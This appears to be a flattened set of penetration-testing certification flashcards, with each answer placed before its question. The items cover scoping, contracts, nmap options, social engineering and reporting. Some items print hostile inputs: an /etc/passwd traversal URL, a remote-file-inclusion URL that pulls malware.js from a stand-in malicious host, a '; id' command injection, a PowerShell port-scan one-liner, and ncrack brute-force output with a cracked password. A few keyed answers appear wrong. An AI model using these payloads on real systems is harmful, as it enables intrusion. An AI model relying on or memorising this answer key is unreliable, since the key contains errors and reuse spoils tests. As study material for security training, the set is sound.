During the information gathering phase of a black box penetration test, you need to eavesdrop on radio frequency emissions emanating from the target's facility and attempt to capture data from its wireless network. You are parked in the organization's parking lot. You want to use aircrack-ng to crack the encryption used by the Wi-Fi network. To accomplish this, you first need to capture the authentication handshake. Which utility should you run on your laptop to do this?
aircrack-ng
During the information gathering phase of a black box penetration test, you need to eavesdrop on radio frequency emissions emanating from the target's facility and attempt to capture data from their wireless network. Before you can do this, you must break the encryption used on the Wi-Fi network. You are parked in the organization's parking lot. Which utility could you use on your Linux laptop to do this?
aireplay-ng
During the information gathering phase of a black box penetration test, you need to eavesdrop on radio frequency emissions emanating from the target's facility and attempt to capture data from their wireless network. You have already captured the authentication handshake. You next need to deauthenticate the wireless client so you can begin capturing data. Which utility should you run on your laptop to do this?
Critical
During the process of completing a penetration test on your company's network, you identify a server that is publicly available on the Internet and is vulnerable to a remote unauthenticated exploit. What kind of risk rating would you assign to this finding?
Shells; Files; Scripts
During the testing phase, you are able to compromise a number of client machines by using Metasploit exploit modules. What types of things might you need to clean up from those systems during post-engagement activities? (Select all that apply.)
The Actions on Objectives phase
During what phase of the Cyber Kill Chain does an attacker steal sensitive information, use unauthorized computing resources to engage in denial-of-service attacks, or modify information?
Passwords stored in plaintext
Encryption at rest and in transit are the best recommended mitigation techniques for which of the following findings in a penetration test?
Weak password complexity
Enforcing minimum password requirements and preventing users from choosing passwords found in common dictionary files would best mitigate what type of finding?
Communication escalation path
Found in the ROE, which component tells the penetration tester(s) who to contact in the event of an issue during an engagement, and how?
Master service agreement
General terms for future agreements and conditions such as payment schedules, intellectual property ownership, and dispute resolution are typically addressed in which contractual document between a penetration tester and their client?
Compliance-based
What type of assessment gauges an organization's implementation of and adherence to a given set of security standards defined for a given environment?
technical constraint
Identified by the target audience of a penetration test, a(n) __________ is a specific technological challenge that could significantly impact an organization (for example, a mission-critical host or delicate legacy equipment that is scheduled for replacement).
Statement of work
If travel to remote field offices or data centers is required as part of a penetration test, in what contractual document would this usually be found?
Ransomware
In 2017 a number of attacks resulted in the end users' data being encrypted and/or stolen and then held by the attacker for payment. Which type of attack is this?
Identify threats
In Microsoft's guidance on threat modeling, which step involves the categorization of external and internal threats to an organization?
case
In a Bash script, you need to prompt the user to select from one of seven different options presented with the echo command. Which control structure would best evaluate the user's input and run the appropriate set of commands?
IP addresses; Domain names
In a penetration test, it often occurs that a great deal of information pertinent to attacking target systems and goals is provided to the penetration tester. Which of the following are often provided by the target organization? (Choose two.)
Command injection
In a text field on a web application, you discover that by entering a semicolon and the *nix command `id`, you can find the username context for the application on the server. What is this an example of?
SCAP
In addition to serving as a method of policy compliance evaluation, __________ is a method for using specific standards for automated discovery and measurement of vulnerabilities.
Assisting the organization with asset categorization and implementation of industry best practices
In addition to their value in compliance-based penetration tests, which of the following is another benefit of testing an environment against CIS preconfigured operational baseline scan templates?
The tester requires sufficient access to the information and resources necessary to successfully complete a full audit.
In compliance-based testing, why is it problematic for a penetration tester to have only limited or restricted access to an organization's network or systems?
Retina scan
In terms of multifactor authentication, which of the following is an example of something you are?
PIN
In terms of multifactor authentication, which of the following is an example of something you know?
Hardwire connection to the organization's internal LAN
In terms of multifactor authentication, which of the following is an example of somewhere you are?
RFID proximity reader
In terms of multifactor authentication, which of the following is an example of somewhere you are?
Sending a pre-engagement survey (also known as a scoping document) to the client for them to fill out
In the scoping phase of a penetration testing engagement, how might a penetration tester effectively obtain the information necessary to begin testing?
Gray box assessment
In which type of penetration test does the tester have a limited amount of information about the target environment but is not granted full access?
Bluejacking
What type of attack is being carried out when a target is being sent unsolicited messages through Bluetooth?
Milestone/stage based
It is often detailed in penetration test contracts that communication with the client is expected when beginning certain phases of testing, such as when beginning a phishing campaign, or when beginning testing of a web application or specific subnet. Which of the following best describes this type of communication?
Provides a means of physical connection to an embedded system for debugging and other testing
JTAG is an IEEE standard component that is best defined as serving what purpose?
Run a test scan in a lab environment first.
Jessica is performing a white box penetration test. She needs to run an invasive vulnerability scan on the target organization's customer database server. What should she do?
whois
Jessica is running a black box penetration test. She needs to find out who the target organization's domain registrar is. She would also like to learn the organization's address and phone number. Which utility should she use?
Denial
Jessica is running a gray box penetration test. She uses the Low Orbit Ion Cannon utility to send a flood of TCP packets to a file server within the organization. As a result, the file server becomes overloaded and can no longer respond to legitimate network requests. Which penetration testing goal has she accomplished?
Availability of internal IT staff
Joshua is running a gray box penetration test. Which one of the following is least likely to have an impact upon when he can run vulnerability scans during the test?
Planning and scoping
Joshua works for a penetration testing consulting firm. During a recent penetration test, he ran an attack tool against the client's public-facing e-commerce website. It went offline for more than an hour. The client is now threatening to sue Joshua's employer. At what stage of the penetration testing process should the consulting firm and the client have agreed upon the risks associated with the test?
Alteration
Kimberly is running a gray box penetration test and discovers a flaw in an online company directory application that allows her to submit LDAP commands in an employee lookup field. She uses this flaw to add a new user account that she can use as a back door. Which penetration testing goal has she accomplished?
The -T0 option will cause the scan to take an inordinate amount of time on such a large subnet.
Kimberly is running a gray box penetration test. The target network uses a 10-net IP addressing scheme with an 8-bit subnet mask (10.0.0.0/8). She needs to run a vulnerability scan on each host on the network. She loads nmap on her laptop, which is connected to the same segment being scanned, using the -T0 option. What did she do incorrectly in this scenario?
audience
Knowing your ________ is one of the most important aspects to keep in mind when writing a report.
Read and (in some cases) execute files on the victim's system
Local file inclusion (LFI) vulnerabilities occur when a web application allows a user to submit input into files or upload files to the server. Successful exploitation could allow an attacker to perform which of the following operations?
Reconnaissance
Lockheed Martin developed the framework that is part of the Intelligence Driven Defense model for the identification and prevention of cyber intrusion activity. This model identifies what adversaries must complete in order to achieve their objective. This model is known as the Cyber Kill Chain model and is made up of seven parts. Which of the following is the first stage of the Cyber Kill Chain, when the attacker is assessing the target from outside of the organization from both a technical and nontechnical perspective?
Directory (path) traversal
What type of attack is shown in the following URL? http://portal.h4cker.org/%2e%2e%5c%2e%2e%2f%2e%2e%5c%2e%2e%5c/omar_file.txt
Slowly covering the sensor with a thin sheet of cardboard
Many devices used to deploy defense in depth in a physical environment rely on automated detection systems. Which of the following methods would be the best way for a physical penetration tester to attempt to bypass a temperature monitoring sensor?
Using the relay to send e-mail to internal or external destinations while impersonating an e-mail address
Misconfiguration of SMTP can result in "open relays," which allow anonymous user connections. How could a penetration tester exploit such a misconfiguration during a penetration test?
Disclosure
Natasha is running a gray box penetration test and discovers a flaw in a web application that allows her to directly access the information stored on the backend database server. Which penetration testing goal has she accomplished?
The SCADA devices
Natasha is running a gray box penetration test. She has initially enumerated the network using a ping sweep and has found an internal web server, a domain controller, a router, and several SCADA devices used on the production floor. Which of these devices could potentially be disrupted by a more intense vulnerability scan? (Choose two.)
Populating graphs with data for press releases
Nessus incorporates NVD's CVSS when producing vulnerability severity information. Which of the following is not a use for this information for a penetration tester?
Insecure hidden form elements
What type of security malpractice is shown in the following example? <input type="hidden" id="123" name="price" value="100.00">
Shared local administrator credentials
Of the following choices, which type of finding is most amplified in severity by a resulting inability to confirm the source of actions taken on a given system using a highly privileged account, effectively destroying the concept of non-repudiation for a given user?
Statement of work
Of the following, which document might be consulted if the client has an issue with accepting a penetration test report that has been provided?
The risk tolerance of the client's organization
Once the completion of testing is done for a client, the tester is prioritizing the findings and recommendations for an executive summary. Which one of the following considerations would be the most beneficial to the client?
Situational awareness
One of the goals of communication between the tester and the client during a penetration test is to ensure that both parties clearly understand the current security state of the network. Which of the following terms best describes this shared understanding?
Compliance-based
One of your clients accepts credit cards from customers and uses its internal network and servers to process payments. The credit card companies each specify that the client must undergo regular penetration testing to ensure that its password policies, data isolation policies, access controls, and key management mechanisms adequately protect consumer credit card data. What type of assessment is required in this scenario?
Threat modeling
One of your clients is a public advocacy group. Some of its political stances are very unpopular with several fringe activists, and they are concerned that a hacktivist may try to hijack their public-facing website. They have asked you to run a penetration test using the same tools and techniques that a typical hacktivist would have the technical aptitude and funds to use. What process has occurred in this scenario?
Pre-merger
One of your clients was recently purchased by a large multinational organization. Before the purchase can be finalized, your client must be subjected to an extensive penetration test. What kind of assessment is required in this scenario?
De-confliction
One potential reason for communicating with the client point of contact during a penetration test is to ensure that a penetration tester's actions are clearly identifiable and distinct from the actions of system accounts or other users that may occur in the environment. What is this concept known as?
De-escalation
One potential reason for communicating with the client point of contact during a penetration test is to provide resolution if a component of testing brings down a system or service, leaving it unavailable for both legitimate users and further testing. Which term best describes this concept?
Press release drafts found on an undocumented web page inside a company's intranet
Open-source intelligence (OSINT) collection frameworks are used to effectively manage sources of collected information. Which of the following best describes open-source intelligence?
Fingerprint web application development frameworks
PHPSESSID and JSESSIONID can be used to do what?
SQL injection
Parameterization of user input and queries is the recommended mitigation technique for which class of vulnerability?
Medium
Per Microsoft's threat modeling system, what would the final risk prioritization be for this vulnerability?
Denial of service
Per US-CERT, which class of attack occurs when "an attacker attempts to prevent legitimate users from accessing information or services"? The most common method is flooding; others include resource leak exposure and excessive allocation.
Insecure Direct Object Reference
What type of vulnerabilities can be triggered by using the parameters in the following URL? http://web.h4cker.org/changepassd?user=chris
Situational awareness
Potential reasons for communicating with the client point of contact during a penetration test are to ensure client understanding of progress and actions taken and to alert the client when beginning testing on a system the client has previously identified as fragile or prone to lockups. This sort of communication is best for maintaining which of the following?
Shared local administrator credentials
Randomization of account credentials through the use of LAPS or similar commercial products such as SAPM is the best mitigation tactic for which class of finding?
Company policies Tolerance to impact
When planning for an engagement, which of the following are the most important? (Choose two.)
Authentication for SNMPv1 and v2 only requires access to the community string in use, which is sent in clear text between the manager and its agents. System default community strings (usually "public" for read-only access, and "private" for write access).
SNMP is an industry-standard network monitoring protocol that allows users to collect and alter information about various devices over a network. Which of the following are features of SNMP or its versions of implementation that can be leveraged to exploit the protocol? (Choose two.)
HTTP parameter pollution (HPP)
What type of vulnerabilities can be triggered by using the parameters in the following URL? https://store.h4cker.org/?search=cars&results=20&search=bikes
Weakness ID Modes of introduction Likelihood of exploit
Which of the following is an identifier provided for CWE entries?
Compliance scan
Security Content Automation Protocol (SCAP) aware scanners, such as Tenable's Nessus, test the implementation of best-practice security configuration baselines from the Center for Internet Security (CIS). For which type of scan are these baselines most helpful?
APT
Which of the following threat actors is probably the most dangerous based on the adversary tier list?
Authority
Several employees of an organization were recently victims of a phishing attack. They received an email that appeared to come from the company president. The email stated that the employees would receive disciplinary action if they did not do as the email instructed and click a link in the message. What principles of social engineering did the attacker use?
Follow-up actions
Several months after completing a penetration test, your client calls and asks you to come back and retest their network to verify that the problems you initially discovered have been properly remediated. What is this process called?
Central processing unit (CPU) RAM
Smartphones and tablet devices are typically built using a system on a chip (SoC), which is a small integrated circuit composed of several physical components, including which of the following? (Choose two.)
XSS attacks
Software developers should escape all characters (including spaces but excluding alphanumeric characters) with the HTML entity &#xHH; format to prevent what type of attack?
By abusing the lack of an authentication process for STP and crafting malicious Bridge Protocol Data Units (BPDUs), selecting a nonexistent switch as the root bridge, and triggering repeated BPDUs from other hosts on the network until a broadcast storm is achieved and the network becomes unresponsive
Spanning Tree Protocol (STP) optimizes switched (that is, Layer 2) networks by ensuring there are no switching loops, and the most effective attacks against it are DoS attacks. Which of the following answers best describes a method for an attacker to specifically target STP and the networks it protects?
Client-side injection attack attempts, such as SQL injection or local file inclusion
Static analysis (sometimes called static application security testing, or SAST) is a debugging method used to examine source code, bytecode, and binaries without execution. Which of the following is not a test case commonly employed as part of static analysis?
Industrial control systems (ICS) used in manufacturing, power generation, water treatment, and other public works
Supervisory Control and Data Acquisition (SCADA) is a real-time control system that monitors the health and status of components of what type of infrastructure?
Unnecessary open services
System hardening is the process of reducing available attack surface in order to mitigate which of the following findings?
Password complexity Data isolation
Systems governed by compliance frameworks such as PCI DSS and HIPAA are often required to meet standards of which of the following? (Choose two.)
Firmware
The CAPEC details thousands of known attack patterns and methodologies. Which of the following is not an attack domain recognized by CAPEC?
base
The CVSS exploitability metrics are part of the __________ metric group.
Processing and rendering of visual data to be displayed
The GPU in a computing system (mobile or otherwise) serves what function?
National Vulnerability Database (NVD)
The National Institute of Standards and Technology (NIST) maintains what public resource for analysis on vulnerabilities published to the CVE dictionary, using the Common Vulnerability Scoring System (CVSS)?
Sandbox escape
The SELinux and AppArmor security frameworks include enforcement rules that attempt to prevent which of the following attacks?
executive summary
The _____________ section of the report should be written in a way that can be understood by a nontechnical audience.
finding and recommendations
The _________________ section of a penetration testing report should contain the technical details of the findings from your testing.
Principle of authority
The chief financial officer (CFO) receives an email from the chief executive officer (CEO) indicating that a new vendor needs to be issued a wire transfer. However, neither the CFO nor the CEO knows who this new vendor is. The CEO claimed that he never sent the email requesting the transfer. What type of motivation technique is the attacker attempting?
Positive attestation of findings
The collection of screenshots of discovered vulnerabilities is one of the easiest methods to provide or facilitate which of the following?
-oN
Which option causes nmap to save its output to a standard text file in the file system of the host where it was run?
Egress sensor bypass
The exterior double glass door to a facility has a motion sensor installed that automatically unlocks the door when someone is leaving the facility. To gain unauthorized access to the facility, a penetration tester sprays a can of air duster in the center crack between the doors to trigger the motion sensor and unlock the door. What is this technique called?
SOAP project file
The function of which support resource is to define a format used for sending and receiving messages?
HAL ART
The native C and C++ libraries present in Android provide support for which of the following applications? (Choose two.)
Weak credentials exploit
The network administrator for an organization that is the target of a penetration test configured her network firewall with an administrative username of admin and a password of password. Which authentication exploit is this device vulnerable to?
Vishing
The president of an organization reported that he has been receiving a number of phone calls from someone claiming to be with the help desk department. This individual is asking for the CEO to verify his network authentication credentials because his computer is broadcasting across the network. What type of attack is taking place?
Remote file inclusion
What type of vulnerability or attack is demonstrated in the following URL? http://web.h4cker.org/?page=http://malicious.h4cker.org/malware.js
Network threats Host threats Application threats
The types of threats identified during the threat modeling process include which of the following? (Choose three.)
Injection attacks
The vulnerability represented by which of the following findings has been number one on the OWASP Top 10 list for a number of years and can often result in theft or destruction of data, or even complete system compromise?
Unnecessary open services
The vulnerability represented by which of the following findings weakens an organization's security posture by increasing its viable attack surface without a business need?
Directory (path) traversal
What type of vulnerability or attack is demonstrated in the following URL? https://store.h4cker.org/buyme/?page=../../../../../etc/passwd
Impact analysis
This key aspect of requirements management is the formal approach to assessing the potential pros and cons of pursuing a course of action.
Fuzzing
Tyson is performing a gray box penetration test. The target organization relies heavily on an application that was developed by internal programmers. He runs the application and then uses a utility to send random, unexpected data to the application's inputs and analyzes how it responds. What kind of application analysis is happening in this scenario?
Enable HTTP Strict Transport Security (HSTS)
Upon completing testing on an Internet-facing application, the penetration tester notices that the application is using only basic authentication. What is the best remediation strategy that the tester should recommend to the client?
-oG
Which option causes nmap to save its output to a text file that can be quickly searched using the grep command?
Badge cloning
Using reconnaissance, a penetration tester learns that the target organization's employees use RFID access badges to unlock doors within the facility. Using the company's website, he identifies high-level employees within the organization. Then he waits in the parking lot until he sees one of these individuals heading toward the front doors. He walks behind them into the reception area with a small RFID reader hidden in his coat. He captures the RFID signature from the individual's badge and then creates his own fake access badge and encodes it with that RFID signature. What is this technique called?
To share files on the network To share printers on the network
What are the functions of the Server Message Block (SMB) protocol? (Choose two.)
They are prone to data emanation.
What are the risks of enabling serial console connections on network devices such as routers and switches?
User accounts created Shells spawned Any files left behind
What elements should you be sure to remove from an exploited system before finalizing a penetration test?
Pivoting
What is another term for lateral movement?
Hashed account passwords
What is stored in the SAM database on a Windows system?
Perform system hardening.
What is the best recommendation to give to a client to mitigate a vulnerability if a penetration tester was able to enter a SQL injection command into a text box and gain access to the information stored on the database?
Implement a strict HSTS policy that prevents a user's browser from opening a page unless an HTTPS connection has been used.
What is the best way to defend against an SSL stripping attack?
Install the latest operating system updates.
What is the best way to defend against kernel exploits?
Validate all findings
What is the best way to ensure that you do not have false positives listed in your final report?
3000
What is the default TCP port the Dradis Framework runs on?
Triggers TCP SYN discovery to named ports
What is the effect of the -PS flag in nmap?
Disables ping and skips host discovery
What is the effect of the -Pn flag in nmap?
Increases the verbosity level of scan output
What is the effect of the -v flag in nmap?
Launching a port scan to the 10.1.2.3 host (scanning for ports 1 through 1024)
What is the following PowerShell command doing? 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.1.2.3",$_))"$_ is open!"} 2>$null
Launching a brute-force attack against an SSH server
What is the following command doing?
root@kali:~# ncrack -p 22 --user dave -P my_list 172.18.104.166
Starting Ncrack 0.6 ( http://ncrack.org ) at 2018-06-25 16:55 EDT
Discovered credentials for ssh on 172.18.104.166 22/tcp:
172.18.104.166 22/tcp ssh: dave 'password123'
Ncrack done: 1 service scanned in 3.00 seconds.
Ncrack finished.
Cracking passwords
What is the following command used for? hashcat --force -m 0 -a 0 -o words file1 file2
To transfer email messages between mail transfer agents (MTAs)
What is the function of the Simple Mail Transfer Protocol (SMTP)?
False positives
What is the main concern with cutting and pasting the results directly from an automated vulnerability scan?
Obtaining written authorization from the client
What is the most important step in the penetration testing planning and scoping process?
Dumpster diving
What is the practice of searching through a target's trash in the hope of finding information that may be of value during a penetration test, such as passwords, usernames, or meeting information that can help when establishing a pretext for a physical penetration test?
Penetration testing report
What is the primary deliverable for a contracted penetration tester?
Active information gathering
What is the process by which large data sets are analyzed to reveal patterns or hidden anomalies?
Threat modeling
What is the process by which risks associated with an organization's information systems are identified, quantified, and addressed?
Omission of findings lower than 3.0 on the CVSS 3.0
When preparing a penetration test report, which of the following is not a recommended best practice?
A reverse DNS query will be run for all discovered ranges.
When used as part of a search through theharvester, what will be the effect of the -n flag?
declare -i TOTAL
Which Bash script command will create a new variable named TOTAL and set its type to be integer?
Supply Chain
Which CAPEC-recognized domain of attack focuses on the manipulation of computer hardware and software within their respective lifecycles?
Ret2libc
Which Linux exploit causes the return address of a subroutine to be replaced by the address of a subroutine that is already present in a process's memory?
Sticky bit
Which Linux special permission, when assigned to a directory, prevents users from deleting files they do not own, even if they have write and execute permissions to the directory?
Double tagging
Which VLAN-hopping technique prepends an otherwise unauthorized VLAN tag to traffic originating from the default VLAN? This traffic is then forwarded to the intended target by the next switch, as if it originated from that unauthorized VLAN, effectively bypassing Layer 3 access control schemes.
Account lockout duration
Which Windows Group Policy setting determines how long a user's account will stay locked if the wrong password has been entered too many times?
Reset account lockout counter after
Which Windows Group Policy setting determines how much time must pass after a failed logon attempt before the failed logon attempt counter is reset to 0?
Unattended installations via PXE
Which Windows feature could potentially allow authentication credentials to be transferred as clear text over a network connection?
Core Services
Which abstraction layer of iOS facilitates fundamental services such as networking and file access?
Proof-of-concept development
Which act describes the writing of a first-of-its-kind exploit to demonstrate or weaponize a vulnerability?
RFID cloning
Which attack enables a penetration tester to duplicate access cards and is of particular value during physical penetration tests?
Jamming
Which attack is a DoS method specifically used to target wireless communication protocols?
Clickjacking
Which authentication exploit utilizes transparent layers within the same web page to trick a user into clicking a button or link when they thought they were just clicking the top-level layer of the page?
Parameter pollution Insecure direct object reference exploit
Which authorization exploits modify a parameter in an HTTP request to gain unauthorized access to information? (Choose two.)
Application layer attacks
Which category of DoS attack attempts to crash a service outright, with its severity measured in requests per second (Rps)?
Advanced persistent threat
Which category of threat actor is highly skilled, frequently backed by nation-state-level resources, and is often motivated by obtaining sensitive information (such as industrial or national secrets) or financial gain?
Insecure direct object reference
Which category of vulnerability is present when a web application provides access to information based solely on user-provided input, as demonstrated in the following sample URL? https://127.0.0.1/salesrecords?salesreceipt=11532
Unvalidated redirect
Which category of web vulnerability occurs when web applications accept untrusted input from users before leading them to a new page?
SQL injection
Which class of attack targets relational databases and can be used to bypass authentication systems; reveal, alter, or destroy data; or even obtain system-level shell access, given the right conditions? It typically relies on a lack of filtering of escape characters in user input or a lack of sufficient control parameters applied to user input, and is best mitigated through the use of parameterized queries.
Persistent XSS
Which client-side attack is part of a class of injection attack that embeds malicious code into a website, frequently one trusted by the victim? In this particular variety, user-provided data is stored on a website that then triggers the execution of code—usually a string of JavaScript.
test
Which command can be used from within an if/then flow control structure in a Bash script to evaluate whether a specified condition is true?
echo $TargetHost
Which command in a PowerShell script will cause it to write the value of a variable named TargetHost on the screen?
print (TargetHost)
Which command in a Python script will cause it to write the value of a variable named TargetHost on the screen?
puts TargetHost
Which command in a Ruby script will cause it to write the value of a variable named TargetHost on the screen?
-sV
Which command option causes nmap to detect services running on a target host and report the version number of any services found?
tcpdump
Which command-line exclusive network protocol analysis tool allows for the capture of packet dumps to and from a given network interface or host, so they may be inspected to determine server responses or related network behavior?
Executive summary
Which component of a written penetration test report is meant to provide a high-level overview of findings without getting too wrapped up in the technical details?
Content providers
Which component of an Android application is functionally a SQLite database that stores data in the form of a flat file?
Airmon-ng
Which component of the aircrack-ng suite of tools is used to put wireless adaptors into monitor mode?
Nondisclosure agreement (NDA)
Which contractual document is a confidentiality agreement that protects the proprietary information and intellectual property of a business?
if/then/else
Which control structure is considered to be a flow control structure?
until loop
Which control structure will keep processing over and over as long as the specified condition evaluates to false?
while loop
Which control structure will keep processing over and over until a specified condition evaluates to false?
for loop
Which control structure will process a specified number of times?
Cold boot attack
Which cryptographic side-channel attack is used to retrieve encryption keys or other data remnants from an operating system and is accomplished by hard rebooting the target system and loading a lightweight OS controlled by the attacker, from which the pre-boot contents of system RAM are written to a file to be parsed later?
Parameterizing queries
Which defense against SQL injection attacks involves using prepared SQL statements with bounded variables?
Statement of work
Which document outlines the project-specific work to be executed by a penetration tester for an organization?
Vulnerability severity rating
Which element of a penetration test report aims to provide a normalized and standardized representation of discovered vulnerabilities and the overall threat they present to an affected system or network?
WEP
Which encryption protocol was part of the original standard for 802.11 wireless communications and is considered a broken encryption algorithm?
Vishing
Which exploit relies on a telephone call to convince someone to reveal sensitive information?
SMS phishing
Which exploit relies on text messaging to deliver phishing messages?
Phishing
Which exploit sends emails indiscriminately to a large number of the target organization's employees, anticipating that a percentage of them will click the malicious link contained in the message?
Spear phishing Whaling
Which exploits require the penetration tester to first conduct extensive reconnaissance to identify specific, high-value individuals to target within the organization? (Choose two.)
REST API
Which feature in Shodan is a collection of documentation that may be useful for developers who want to integrate Shodan searching into tools or applications they have developed or are currently developing?
Shared local administrator credentials Passwords stored in plaintext
Which findings reduce an organization's security posture through both the simplification of lateral movement for a theoretical adversary and by destroying the concept of non-repudiation and verification of individuals responsible for actions under a given username? (Choose two.)
Document Object Model (DOM)
Which form of a cross-site scripting (XSS) attack leverages an older, vulnerable web browser being run locally on the victim's computer?
Stored/persistent Reflected
Which forms of a cross-site scripting (XSS) attack are considered to be server-side exploits? (Choose two.)
FOCA
Which free and GNU-licensed tool written for the Windows operating system family gathers information by scraping metadata from Microsoft Office documents, which can include usernames, e-mail addresses, and real names?
ATT&CK
Which knowledge base maintained by MITRE details techniques and adversarial behavior that can be used to attack organizations?
GLBA
Which law regulates how financial institutions handle customers' personal information?
HIPAA
Which law requires that healthcare-related organizations must be in compliance with certain security standards?
SARBOX
Which law sets standards for publicly traded companies in the United States with respect to security policies, standards, and controls?
Scrubbing
Which lock-picking technique is performed by swiftly and repeatedly dragging a pick back and forth across the pins in a tumbler while adjusting the pressure on the torque wrench?
Double-tagging
Which method is commonly used to hop between VLANs?
Evil twin
Which method of attacking Wi-Fi networks occurs when an attacker creates a wireless access point with an ESSID identical to one to which an unwitting user intends to connect? As they negotiate a connection, users pass authentication information to this malicious access point, enabling attackers to recover victim device user traffic or access credentials. This attack frequently abuses the fact that wireless networks are typically presented in order of signal strength and can therefore benefit from high-gain wireless antennae or close physical proximity to a connecting client.
File excavation
Which method of collecting open-source intelligence consists of the collection of published documents, such as Microsoft Office or PDF files, and parsing the information hidden within to reveal usernames, e-mail addresses, or other sensitive data?
APK Studio
Which mobile tool can be used to reverse engineer an APK file from a mobile device running the Android operating system?
APKX
Which mobile tool is a Python wrapper that can extract Java source code directly from an Android APK executable?
Drozer
Which mobile tool provides an attack framework that can be used to exploit mobile devices running the Android operating system?
Authority
Which motivation factor gets people to act because someone with clout wants them to?
Social proof
Which motivation factor gets people to act because they believe that "everyone else is doing it"?
Likeness
Which motivation factor gets people to act because they want to please the person making a request of them?
Fear
Which motivation factor gets people to act because they worry about the consequences of not acting?
Urgency
Which motivation factor gets people to act quickly because they believe someone needs help?
Scarcity
Which motivation factor gets people to act quickly due to a sense of limited supply?
Authority
Which motivation technique attempts to leverage a person's respect for leadership in legal, organizational, or social contexts to gain access to property or controlled information?
DNS
Which name resolution service serves internal and external networks, providing resolution for requests sent to port 53/UDP and zone transfers over port 53/TCP?
DNS cache poisoning
Which network-based attack consists of overwriting a name resolution cache with a malicious web address, resulting in targeted users visiting the malicious site rather than the one they intended to visit?
LLMNR/NBT-NS poisoning
Which network-based attack is performed against targets that use NTLM authentication by responding to name resolution requests while impersonating authoritative sources on the network, and results in the target sending their username and NTLMv2 hash to the attacker when successful?
-n
Which nmap flag is used to disable DNS resolution of hostnames?
-iL
Which nmap flag should precede a file containing a list of targets to be scanned?
--proxies
Which nmap option causes the utility to relay connections through a proxy server?
-p- 1-65535
Which nmap switch must a penetration tester use if they want to scan all the TCP ports on an identified device?
-T5
Which nmap timing option causes it to scan in Insane mode?
-T0
Which nmap timing option causes it to scan in Paranoid mode?
-T2
Which nmap timing option causes it to scan in Polite mode?
smb-enum-shares nfs-showmount
Which of the following NSE scripts would be best used to enumerate shared storage volumes on a network? (Choose two.)
-sT
Which of the following Nmap options would you use to perform a TCP connect scan?
Invoke-ReflectivePEInjection
Which of the following PowerSploit scripts can reflectively inject a DLL into a remote process?
Enforce password history
Which of the following Windows Group Policy settings can be used to prevent a user from reusing the same password over and over?
Maximum password age
Which of the following Windows Group Policy settings determines how long a user can keep the same password before being required to change it to a new one?
Minimum password age
Which of the following Windows Group Policy settings determines how long a user must keep the same password before being allowed to change it to a new one?
Store passwords using reversible encryption
Which of the following Windows Group Policy settings should never be enabled?
PS Remoting WinRM
Which of the following Windows features can be used to remotely manage Windows systems over a network connection? (Choose two.)
Dynamic code analysis Fuzzing
Which of the following application scanning techniques are performed on running applications? (Choose two.)
Static code analysis
Which of the following application scanning techniques is performed by reviewing an application's source code?
Fuzzing
Which of the following application scanning techniques is performed by sending random, unexpected, or invalid data to the inputs of an application to see how it responds?
Web Application Description Language (WADL)
Which of the following architectures is used to provide an XML-based description of HTTP-based web services running on a web application server and is commonly used with Representational State Transfer (REST) web applications?
Use Group Policy to configure account lockout. Delete or disable all unused user accounts.
Which of the following are common methods used to harden user accounts on a Windows-based computer system? (Choose two.)
Use Group Policy to enforce password complexity requirements. Use Group Policy to enforce password aging requirements.
Which of the following are common methods used to harden user accounts on a Windows-based computer system? (Choose two.)
Medusa Hydra
Which of the following are commonly used to perform brute-force password attacks? (Choose two.)
FTP Telnet
Which of the following are considered unsecure services or protocols? (Choose two.)
SQL injections HTML script injections Object injections
Which of the following are examples of code injection vulnerabilities?
Shell upgrade Virtual machine (VM) escape Container escape
Which of the following are examples of sandbox escape exploits? (Choose three.)
Including comments in the source code Providing verbose error messages
Which of the following are examples of unsecure coding practices?
Lack of error handling routines Lack of code signing
Which of the following are examples of unsecure coding practices?
Applications running within a container environment may not be detectable by traditional vulnerability scans. Vulnerabilities associated with the base operating system of the container host may be inherited by its containers.
Which of the following are issues you may need to consider when performing a vulnerability scan within an organization that runs network applications within containers? (Choose two.)
Dispute resolution practices Indemnification clauses
Which of the following are items typically addressed in a master service agreement (MSA)? (Choose two.)
PowerShell PSExec WMI
Which of the following are legitimate Windows tools that can be used for post-exploitation tasks?
Creating and manipulating scheduled jobs and tasks Creating custom daemons and processes Creating new users
Which of the following are post-exploitation activities to maintain persistence in a compromised system?
Rooting or jailbreaking Inconsistent updating
Which of the following are security weaknesses associated with mobile devices? (Choose two.)
ICS SCADA
Which of the following are special network devices that are commonly used to control manufacturing equipment and environmental systems? (Choose two.)
Maltego Shodan Dig
Which of the following are tools commonly used for passive reconnaissance?
It is commonly used in the absence of a DNS server. It allows the IPv6 host to resolve hostnames on the same local link.
Which of the following are true of the Link-Local Multicast Name Resolution (LLMNR) protocol? (Choose two.)
Compliance-based Goals-based
Which of the following are types of point-in-time assessments? (Choose two.)
The community string is valid for every SNMPv1 node. The community string is transmitted as clear text.
Which of the following are vulnerabilities associated with the SNMPv1 protocol? (Choose two.)
Using unquoted service paths Replacing executables for writable services
Which of the following are ways in which services on a Windows system can be exploited? (Choose two.)
Organized crime Nation-state
Which of the following attackers are most likely to be able to carry out an advanced persistent threat (APT)? (Choose two.)
An individual within the target organization who has a direct line of communication with the penetration tester
Which of the following best describes a trusted agent during a penetration test?
Identifies and authenticates a user's device on a cellular network
Which of the following best describes the role of a subscriber identity module (SIM) on a mobile device?
Making unauthorized changes to information
Which of the following best describes the term alteration within the context of penetration testing?
Ensuring information remains available for authorized access
Which of the following best describes the term availability within the context of penetration testing?
Preventing unauthorized access to information
Which of the following best describes the term confidentiality within the context of penetration testing?
Preventing the legitimate use of information
Which of the following best describes the term denial within the context of penetration testing?
Gaining unauthorized access to information
Which of the following best describes the term disclosure within the context of penetration testing?
Preventing unauthorized modifications to information
Which of the following best describes the term integrity within the context of penetration testing?
A penetration tester must think like an adversary who might attack the system in the real world.
Which of the following best describes the term the hacker's mindset within the context of penetration testing?
Administratively configure access ports as access ports so that users cannot negotiate a trunk; also disable the negotiation of trunking (that is, do not allow Dynamic Trunking Protocol [DTP]). Limit the number of MAC addresses learned on a given port with the port security feature. Control Spanning Tree to stop users or unknown devices from manipulating it. You can do so by using the BPDU Guard and Root Guard features.
Which of the following best practices help protect against VLAN hopping and Layer 2 attacks?
Keyloggers
Which of the following can attackers use to capture every keystroke of a user in a system and steal sensitive data (including credentials)?
Information from the organization's DNS registrar Job postings on the organization's website
Which of the following can be considered OSINT related to the target of a penetration test? (Choose two.)
Social media posts Corporate tax filings
Which of the following can be considered OSINT related to the target of a penetration test? (Choose two.)
RDP, Apple Remote Desktop, and VNC
Which of the following can be used for lateral movement?
PowerShell
Which of the following can be used for post-exploitation activities?
Patator Aircrack-ng
